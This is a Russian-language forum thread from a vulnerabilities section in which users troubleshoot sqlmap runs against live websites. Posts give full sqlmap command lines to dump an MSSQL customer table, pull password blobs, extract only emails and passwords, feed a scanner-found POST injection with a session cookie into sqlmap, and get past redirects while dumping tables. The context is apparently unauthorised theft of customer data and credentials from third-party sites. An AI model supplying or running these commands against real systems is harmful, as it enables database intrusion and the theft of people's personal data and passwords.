Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    Так в том то и дело, что когда используешь where, перестает извлекать. Без where, все подряд без проблем извлекается
     
  2. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    еще такой вопрос, можно ли как то извлечь данные, по критерию: длинна содержимого колонки.
    Допустим мне нужны все строки, где длинна определенной колонки не 7 символов?
     
  3. fandor9

    fandor9 Member

    Joined:
    16 Nov 2018
    Messages:
    101
    Likes Received:
    72
    Reputations:
    4
    А вы уверены что колонка у вас называется "Customer Group", а не "Customer_Group"? Если точно с пробелом, то попробуйте поставить имя колонки в одинарные кавычки:
    Code:
    ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "'Customer Group' IS NOT NULL" --dump --threads=10 -v 3
     
  4. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    162
    Likes Received:
    4
    Reputations:
    0
    <div class="error-page">
    <h1>Oops - It seems the page you are looking for is not here</h1>
    <p>CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;&#039;DLAj29&#039;&#039; order by t.id desc limit 9&#039; at line 4</p>

    не крутится( какой темпер можно заюзать?

    Yii Framework/PDO
     
  5. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    вдруг кому будет полезно.
    тут DBMS is Microsoft SQL Server это сработало.
     
  6. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    289
    Likes Received:
    139
    Reputations:
    2
    Попадались мне тоже пробелы в MSSQL( Правда было в имени БД) помогло добавление вместо пробела %20, и мапа начала крутить без проблем. По идее должно для всего работать.
    Code:
    ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C Customer%20Group --where="'Customer%20Group' IS NOT NULL" --dump --threads=10 -v 3
    
    так по пробуй.
     
    #986 karkajoi, 5 Nov 2019
    Last edited: 5 Nov 2019
  7. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    уж не знаю, в чем там дело.
    --where="Customer%20Group=General" - не работает (в любых комбинациях, и да General значения там есть)
    --where="Email LIKE '%@site.com'" - прекрасно работает
     
  8. xCharley88x

    xCharley88x New Member

    Joined:
    6 Nov 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток
    есть проблемма с выводом из базы
    +-------------------+-------------+
    | Column | Type |
    +-------------------+-------------+
    | aPass | blob |

    --hex и --no-cast не подходят,меняется вывод но проблемма не решается
    --binary-fields тоже
    пассы судя по всему в открытом виде не хэш
    есть тут кто может помочь?
    за помощ отблагодарю!
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,471
    Likes Received:
    791
    Reputations:
    834
    пробуйте с начало руками, смотрите в чем проблема, может своими запросами получится через --sql-shell, думаю что какой-то косяк с кодировкой что бьет вывод
     
    _________________________
  10. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    2,008
    Likes Received:
    845
    Reputations:
    198
    blob выводится через --hex так в чем проблема то?
     
    _________________________
  11. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    Народ, кто встречал такое:
    Извлекаю уже на третьем сайте, подобную хрень:
    ?t?1f?????F/???|????6(?\\R?jGa??,b?`???????
    Соль такого формата
    -121880803
    либо положительное значение.

    Пробовал закинуть свой пас и извлечь хэш, получил тоже самое.
    закинул в базу пароль: 123qwe
    получил его хэш: ?;\n?p????x=A?F??)9???hR??Pr????q??

    Кто встречал подобное? Грешил на язык, но вроде и сайты англоязычные и это же хэш) они бывают на других языках? ) Сори не так давно работаю с хэш функциями, не во всем разб
     
    #991 Estet, 7 Nov 2019
    Last edited: 7 Nov 2019
  12. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Сканер нашел уязвимость,но я с таким столкнулся впервые
    Code:
    -u "https://site.com/user_save.php" -p "county_id" --risk="3" --method="POST" --data="--31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22forename%22
    
    Smith
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22surname%22
    
    Smith
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22email%22
    
    netsparker@example.com
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22new_pass%22
    
    N3tsp@rker-
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22retype_pass%22
    
    N3tsp@rker-
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22county_id%22
    
    test
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22town_id%22
    
    893
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22phone%22
    
    3
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22mobile%22
    
    3
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22terms_conditions%22
    
    on
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22subscribe_emails%22
    
    on
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22g-recaptcha-response%22
    
    10000000146
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22submit%22
    
    Create Account
    --31ed9d031d5848e3a524ba24f417a44b--
    " --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" --cookie="PHPSESSID=vorccgbo8prl78srfaqavg0map" --headers="Host:www.site.com\nCache-Control:no-cache\nReferer:https://site.com/user_save.php\nAccept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\nAccept-Language:en-us,en;q=0.5\nX-Scanner:Netsparker\nAccept-Encoding:gzip, deflate\nContent-Type:multipart/form-data; boundary=31ed9d031d5848e3a524ba24f417a44b" --dbms="MySQL"
    Пробую через sqlmap - получаю такую ошибку:
    [CRITICAL] all testable parameters you provided are not present within the given request data

    Как правильно скормить в sqlmap?
     
  13. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    290
    Likes Received:
    81
    Reputations:
    1
    take request with burp suite
     
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,471
    Likes Received:
    791
    Reputations:
    834
    Правильно сложите весь пакет запроса в файл и подключите его через параметр: sqlmap.py -r file.txt
     
    _________________________
    vladF likes this.
  15. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Такая же ошибка вылетает.. Подскажите, как "Правильно сложить весь пакет"? Может я что-то не так делаю..
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,471
    Likes Received:
    791
    Reputations:
    834
    зайти на этот урл, и сделай то действие чтоб перехватить запрос, так полагаю это сохранение по название скрипта, перехватываешь тело запроса и кладешь в файлик, а дальше этот файлик скармливаешь скульмапу, если известен уязвимый параметр, то помечаешь его * чтоб скульмап зря не тратил время на другие параметры и сразу обратился к нему.
     
    _________________________
    vladF likes this.
  17. fandor9

    fandor9 Member

    Joined:
    16 Nov 2018
    Messages:
    101
    Likes Received:
    72
    Reputations:
    4
    честно говоря, сам не встречался с таким, но судя по выводу похоже что мап выдаёт вам сразу бинарные данные (байты), а ваша консоль конвертирует их сразу в ASCII. И тогда вы получаете вот такую вот хрень. Можете попробовать прогнать мап через локальный веб-прокси (Burp и прочее) и посмотреть что там вам выдаёт мап.
     
  18. jakonda1001

    jakonda1001 Member

    Joined:
    17 Mar 2016
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    блин не пойму как сдампить только мыльники и пароли (не проверяя в какой они таблице, если есть) (просто пример любой на вскидку, дальше по аналогии пойму)
     
  19. Goore

    Goore New Member

    Joined:
    30 Mar 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Server:

    web server operating system: Windows 10 or 2016
    web application technology: ASP.NET, Microsoft IIS 10.0, ASP
    back-end DBMS: active fingerprint: Microsoft SQL Server 2017

    Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)


    sqlmap udalos vitashits DB list(55 Dbs) - no kogda delaesh -D db --tables, srazu pokazivaet redirekt na orginal sait www.sait.com - i ne daet vitashits tablici, sto delats?
    databases udalos vitashits tolka s --no-cast

    "sqlmap got a 302 redirect to 'http://www.sait.com'. Do you want to follow? [Y/n]"
    kogda vitaskival DB ne prosilo takoe, i vse skachalos norm
     
  20. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    290
    Likes Received:
    81
    Reputations:
    1
    you can use --ignore-redirects option or dump all data in one request without --db/tables/columns, only --dump command
     
Loading...